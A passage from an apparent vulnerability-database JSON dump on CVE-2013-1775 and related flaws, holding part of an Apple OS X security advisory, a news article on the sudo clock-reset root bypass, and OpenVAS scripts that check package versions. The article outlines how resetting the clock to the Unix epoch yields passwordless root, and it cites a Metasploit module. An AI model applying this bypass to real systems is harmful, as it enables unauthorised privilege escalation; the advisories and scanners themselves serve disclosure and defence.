termination or\r\narbitrary code execution\r\nDescription: A memory corruption issue existed in handling of\r\nUnicode strings. This issue was addressed by improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-3794 : Adam Greenbaum of Refinitive\r\n\r\nsudo\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in sudo versions prior to\r\n1.7.10p9, the most serious of which may allow an attacker access to\r\narbitrary files\r\nDescription: Multiple vulnerabilities existed in sudo versions prior\r\nto 1.7.10p9. These were addressed by updating sudo to version\r\n1.7.10p9.\r\nCVE-ID\r\nCVE-2013-1775\r\nCVE-2013-1776\r\nCVE-2013-2776\r\nCVE-2013-2777\r\nCVE-2014-0106\r\nCVE-2014-9680\r\n\r\ntcpdump\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in tcpdump 4.7.3, the most\r\nserious of which may allow a remote attacker to cause a denial of\r\nservice.\r\nDescription: Multiple vulnerabilities existed in tcpdump versions\r\nprior to 4.7.3. These were addressed by updating tcpdump to version\r\n4.7.3.\r\nCVE-ID\r\nCVE-2014-8767\r\nCVE-2014-8769\r\nCVE-2014-9140\r\n\r\nText Formats\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted text file may lead to\r\ndisclosure of user information\r\nDescription: An XML external entity reference issue existed with\r\nTextEdit parsing. This issue was addressed through improved parsing.\r\nCVE-ID\r\nCVE-2015-3762 : Xiaoyong Wu of the Evernote Security Team\r\n\r\nudf\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted DMG file may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in parsing of\r\nmalformed DMG images. 
This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3767 : beist of grayhash\r\n\r\nOS X Yosemite v10.10.5 includes the security content of Safari 8.0.8:\r\nhttps://support.apple.com/en-us/HT205033\r\n\r\nOS X Yosemite 10.10.5 and Security Update 2015-006 may be obtained\r\nfrom the Mac App Store or Apple's Software Downloads web site:\r\nhttp://www.apple.com/support/downloads/\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: https://support.apple.com/kb/HT201222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n\r\n\r\n", "edition": 1, "modified": "2015-08-17T00:00:00", "published": "2015-08-17T00:00:00", "id": "SECURITYVULNS:DOC:32390", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32390", "title": "APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update 2015-006", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:01", "bulletinFamily": "software", "cvelist": ["CVE-2015-5768", "CVE-2015-5600", "CVE-2015-2787", "CVE-2015-5779", "CVE-2013-1775", "CVE-2015-3185", "CVE-2015-3786", "CVE-2015-1792", "CVE-2015-3761", "CVE-2014-7844", "CVE-2015-3781", "CVE-2015-3776", "CVE-2015-2783", "CVE-2015-5748", "CVE-2014-1912", "CVE-2015-5477", "CVE-2015-3802", "CVE-2015-3797", "CVE-2014-0191", "CVE-2015-3762", "CVE-2015-3329", "CVE-2009-5078", "CVE-2015-5754", "CVE-2015-3783", "CVE-2015-3330", "CVE-2014-3613", "CVE-2015-1789", "CVE-2015-3789", "CVE-2014-8150", "CVE-2014-3583", "CVE-2015-3779", "CVE-2015-3788", "CVE-2015-3778", "CVE-2015-0241", "CVE-2013-1776", "CVE-2015-5776", "CVE-2015-3766", "CVE-2015-3775", "CVE-2013-7338", "CVE-2015-3798", "CVE-2015-5777", "CVE-2015-3765", "CVE-2015-3782", "CVE-2015-0242", "CVE-2015-0253", "CVE-2015-3784", "CVE-2015-3787", "CVE-2015-3799", 
"CVE-2015-3153", "CVE-2015-3768", "CVE-2015-3760", "CVE-2015-4148", "CVE-2015-5781", "CVE-2015-3805", "CVE-2015-3790", "CVE-2015-5774", "CVE-2015-3792", "CVE-2015-3803", "CVE-2015-3307", "CVE-2015-4025", "CVE-2015-5784", "CVE-2015-5751", "CVE-2015-4024", "CVE-2015-3795", "CVE-2015-5750", "CVE-2015-5747", "CVE-2015-4021", "CVE-2015-3144", "CVE-2014-7185", "CVE-2015-5761", "CVE-2013-2777", "CVE-2015-3794", "CVE-2015-5773", "CVE-2015-3769", "CVE-2014-3707", "CVE-2015-3800", "CVE-2015-0228", "CVE-2015-3807", "CVE-2015-0244", "CVE-2015-4026", "CVE-2014-8769", "CVE-2015-5756", "CVE-2014-3660", "CVE-2015-1788", "CVE-2015-4147", "CVE-2014-8161", "CVE-2012-6685", "CVE-2015-5753", "CVE-2015-3183", "CVE-2015-3772", "CVE-2014-3620", "CVE-2014-9140", "CVE-2013-2776", "CVE-2015-4022", "CVE-2015-3770", "CVE-2015-3777", "CVE-2015-5771", "CVE-2015-5775", "CVE-2015-3780", "CVE-2013-7422", "CVE-2015-5755", "CVE-2015-3145", "CVE-2015-1790", "CVE-2015-5758", "CVE-2014-0106", "CVE-2015-0243", "CVE-2015-3804", "CVE-2015-3773", "CVE-2014-3581", "CVE-2015-3774", "CVE-2015-5782", "CVE-2014-8109", "CVE-2015-5778", "CVE-2013-7040", "CVE-2015-3757", "CVE-2015-3764", "CVE-2015-3143", "CVE-2014-0067", "CVE-2015-5772", "CVE-2015-3791", "CVE-2014-9365", "CVE-2014-8151", "CVE-2015-5757", "CVE-2015-3796", "CVE-2009-5044", "CVE-2015-5783", "CVE-2014-9680", "CVE-2015-5763", "CVE-2014-8767", "CVE-2015-3767", "CVE-2015-3806", "CVE-2015-1791", "CVE-2015-3771", "CVE-2015-3148"], "description": "Over 150 different vulnerabilities in system components and libraries.", "edition": 1, "modified": "2015-08-17T00:00:00", "published": "2015-08-17T00:00:00", "id": "SECURITYVULNS:VULN:14630", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14630", "title": "Apple Mac OS X / OS X Server multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2017-01-08T18:01:16", 
"bulletinFamily": "info", "cvelist": ["CVE-2013-1775"], "description": "[](<http://1.bp.blogspot.com/-p4Nui4O4jQY/UiDkJph071I/AAAAAAAAXaI/FXSMCOCLLxA/s1600/Apple+Mac+OS+X+Vulnerability+enables+Super+User+to+Hackers+by+resetting+the+clock.png>)\n\nDo you think, because you\u2019re using an [Apple Mac](<http://thehackernews.com/search/label/Apple>), your data is safe from hackers? Well, that is not true: there are dozens of security weaknesses, and today researchers have made it easier to exploit a flaw in Apple Mac OS X that allows penetration testers and hackers to gain root access. \n \nThe flaw, dubbed [CVE-2013-1775](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1775>), has remained unpatched by Apple for the last five months; it allowed attackers to bypass normal [password](<http://thehackernews.com/2013/05/cracking-16-character-strong-passwords.html>) authentication procedures by resetting the computer clock to January 1, 1970. \nThat specific date is required because it represents the beginning of time (the Unix epoch) to the [operating system](<http://thehackernews.com/2013/02/firefox-os-for-smartphones-incredible.html>) and some applications that run on it. When the SUDO command is used in combination with a clock reset, the computer can be tricked into providing root access without a password. \n \n[Metasploit](<http://thehackernews.com/search/label/Metasploit>) authors have come up with a brand [new module](<http://www.rapid7.com/db/modules/exploit/osx/local/sudo_password_bypass>) that makes the bug even easier to [exploit](<http://thehackernews.com/search/label/exploit%20code>), renewing interest in the problem. The module gains a session with root permissions as long as the user ran the SUDO command before and as long as they have administrative privileges. \n \nH.D. 
Moore, founder of Metasploit, warned that this was a serious [vulnerability](<http://thehackernews.com/search/label/Vulnerability>): \u201c_The bug is significant because it allows any user-level compromise to become root, which in turn exposes things like clear-text passwords from Keychain and makes it possible for the intruder to install a permanent rootkit_.\u201d \n \nIn addition, the hacker needs to have either physical or remote access to the machine. Apple has yet to respond or issue a patch for the bug. As a result, all versions of the operating system from OS X 10.7 to the current 10.8.4 are affected. \n\n\n \n\n\nMost of the recent exploits of Mac OS X have been related to Java, which Apple completely blocked earlier this year over security vulnerabilities.\n", "modified": "2013-08-30T18:32:35", "published": "2013-08-30T07:32:00", "id": "THN:7BDF45E62E28D5D2D535B9AE55F8A825", "href": "http://thehackernews.com/2013/08/apple-mac-os-x-vulnerability-enables.html", "type": "thn", "title": "Apple Mac OS X Vulnerability enables Root User to Hackers by resetting the clock", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-01-26T11:10:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775"], "description": "Check for the Version of sudo", "modified": "2018-01-25T00:00:00", "published": "2013-03-05T00:00:00", "id": "OPENVAS:841349", "href": "http://plugins.openvas.org/nasl.php?oid=841349", "type": "openvas", "title": "Ubuntu Update for sudo USN-1754-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1754_1.nasl 8526 2018-01-25 06:57:37Z teissa $\n#\n# Ubuntu Update for sudo USN-1754-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it 
and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"sudo on Ubuntu 12.10 ,\n Ubuntu 12.04 LTS ,\n Ubuntu 11.10 ,\n Ubuntu 10.04 LTS ,\n Ubuntu 8.04 LTS\";\ntag_insight = \"Marco Schoepl discovered that Sudo incorrectly handled time stamp files\n when the system clock is set to epoch. A local attacker could use this\n issue to run Sudo commands without a password prompt.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1754-1/\");\n script_id(841349);\n script_version(\"$Revision: 8526 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-25 07:57:37 +0100 (Thu, 25 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-05 09:49:10 +0530 (Tue, 05 Mar 2013)\");\n script_cve_id(\"CVE-2013-1775\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1754-1\");\n script_name(\"Ubuntu Update for sudo USN-1754-1\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of sudo\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security 
Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.8.3p1-1ubuntu3.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sudo-ldap\", ver:\"1.8.3p1-1ubuntu3.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.7.4p6-1ubuntu2.2\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sudo-ldap\", ver:\"1.7.4p6-1ubuntu2.2\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.7.2p1-1ubuntu5.6\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sudo-ldap\", ver:\"1.7.2p1-1ubuntu5.6\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.6.9p10-1ubuntu3.10\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 
}\n\n if ((res = isdpkgvuln(pkg:\"sudo-ldap\", ver:\"1.6.9p10-1ubuntu3.10\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.8.5p2-1ubuntu1.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sudo-ldap\", ver:\"1.8.5p2-1ubuntu1.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-03-05T00:00:00", "id": "OPENVAS:1361412562310841349", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841349", "type": "openvas", "title": "Ubuntu Update for sudo USN-1754-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1754_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for sudo USN-1754-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1754-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841349\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-05 09:49:10 +0530 (Tue, 05 Mar 2013)\");\n script_cve_id(\"CVE-2013-1775\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1754-1\");\n script_name(\"Ubuntu Update for sudo USN-1754-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'sudo'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(12\\.04 LTS|11\\.10|10\\.04 LTS|8\\.04 LTS|12\\.10)\");\n script_tag(name:\"affected\", value:\"sudo on Ubuntu 12.10,\n Ubuntu 12.04 LTS,\n Ubuntu 11.10,\n Ubuntu 10.04 LTS,\n Ubuntu 8.04 LTS\");\n script_tag(name:\"insight\", value:\"Marco Schoepl discovered that Sudo incorrectly handled time stamp files\n when the system clock is set to epoch. 
A local attacker could use this\n issue to run Sudo commands without a password prompt.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.8.3p1-1ubuntu3.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sudo-ldap\", ver:\"1.8.3p1-1ubuntu3.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.7.4p6-1ubuntu2.2\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sudo-ldap\", ver:\"1.7.4p6-1ubuntu2.2\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.7.2p1-1ubuntu5.6\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sudo-ldap\", ver:\"1.7.2p1-1ubuntu5.6\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.6.9p10-1ubuntu3.10\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sudo-ldap\", ver:\"1.6.9p10-1ubuntu3.10\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) 
exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.8.5p2-1ubuntu1.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sudo-ldap\", ver:\"1.8.5p2-1ubuntu1.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-03-19T00:00:00", "id": "OPENVAS:1361412562310865477", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865477", "type": "openvas", "title": "Fedora Update for sudo FEDORA-2013-3297", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for sudo FEDORA-2013-3297\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-March/100157.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865477\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-19 09:37:05 +0530 (Tue, 19 Mar 2013)\");\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2013-3297\");\n script_name(\"Fedora Update for sudo FEDORA-2013-3297\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'sudo'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n script_tag(name:\"affected\", value:\"sudo on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.8.6p7~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:51:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776"], "description": "Check for the Version of sudo", "modified": "2017-07-10T00:00:00", "published": "2013-03-19T00:00:00", "id": "OPENVAS:865477", "href": "http://plugins.openvas.org/nasl.php?oid=865477", "type": "openvas", "title": "Fedora Update for sudo FEDORA-2013-3297", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for sudo FEDORA-2013-3297\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"sudo on Fedora 18\";\ntag_insight = \"Sudo (superuser do) allows a system administrator to give certain\n users (or groups of users) the ability to run some (or all) commands\n as root while logging all commands and arguments. 
Sudo operates on a\n per-command basis. It is not a replacement for the shell. Features\n include: the ability to restrict what commands a user may run on a\n per-host basis, copious logging of each command (providing a clear\n audit trail of who did what), a configurable timeout of the sudo\n command, and the ability to use the same configuration file (sudoers)\n on many different machines.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-March/100157.html\");\n script_id(865477);\n script_version(\"$Revision: 6628 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:32:47 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-19 09:37:05 +0530 (Tue, 19 Mar 2013)\");\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2013-3297\");\n script_name(\"Fedora Update for sudo FEDORA-2013-3297\");\n\n script_summary(\"Check for the Version of sudo\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"sudo\", 
rpm:\"sudo~1.8.6p7~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776", "CVE-2013-2776"], "description": "The remote host is missing an update for the 'sudo' package(s) announced via the referenced advisory.", "modified": "2018-11-23T00:00:00", "published": "2013-10-03T00:00:00", "id": "OPENVAS:1361412562310871048", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871048", "type": "openvas", "title": "RedHat Update for sudo RHSA-2013:1353-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for sudo RHSA-2013:1353-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871048\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-10-03 10:17:42 +0530 (Thu, 03 Oct 2013)\");\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\", \"CVE-2013-2776\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for sudo RHSA-2013:1353-01\");\n\n\n script_tag(name:\"affected\", value:\"sudo on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"insight\", value:\"The 